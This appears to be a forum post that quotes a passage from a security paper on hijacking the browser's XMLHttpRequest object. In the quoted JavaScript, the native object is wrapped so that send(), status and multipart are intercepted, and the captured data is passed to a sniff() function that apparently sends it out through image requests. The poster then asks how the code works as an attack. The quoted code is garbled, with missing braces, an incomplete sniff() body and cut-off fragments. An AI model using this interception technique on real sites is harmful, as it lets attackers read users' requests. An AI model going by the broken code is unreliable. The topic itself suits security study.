The most important concept could be explained by
looking at the following code:
var xmlreqc=XMLHttpRequest;
XMLHttpRequest = function() {
this.xml = new xmlreqc();
return this;
In this example, the reference to XMLHttpRequest
native object is saved in a new variable and
XMLHttpRequest is readdressed to a new object by
using one of the many ways of creating a
constructor. Inside the constructor, a new attribute is
instantiated as the previously saved real
XMLHttpRequest. From now on, every cloned object

will be a wrapper clone and not a clone of the
original one.
What follows is the implementation of wrapper
methods for some of XMLHttpRequest native
objects, in order to create a Man in the middle
attack (ref. Figure 2).
Before we go into deep of hijacking, let's suppose
there is a 'sniff()' function using the techniques
described by Rager[13] and Grossman[6]:
function sniff(){
var data='';
for(var i=0; i<arguments.length; i++)
image = document.createElement('img');
if(data.length> 1024)
data= data.substring(0, 1024) ;

Let's now show some examples that wrap native
methods and intercept them.
XMLHttpRequest.prototype.send = function (pay){
// Hijacked .send
sniff("Hijacked: "+" "+pay);
return this.xml.send(pay);

Next code example could allow an attacker to modify
any native attribute values or application behaviour,
by using defineSetter and defineGetter methods[14]:
"multipart",function (h){ // Hijacked multipart
sniff("multipart: "+" "+h);
return h;
'status",function (){ // Hijacked status
h=this.xml.status ;
sniff("status: "+" "+h);
return h;
I can't understand how the blod codes can be used for attack . especially first bold

Please guide thanks in advance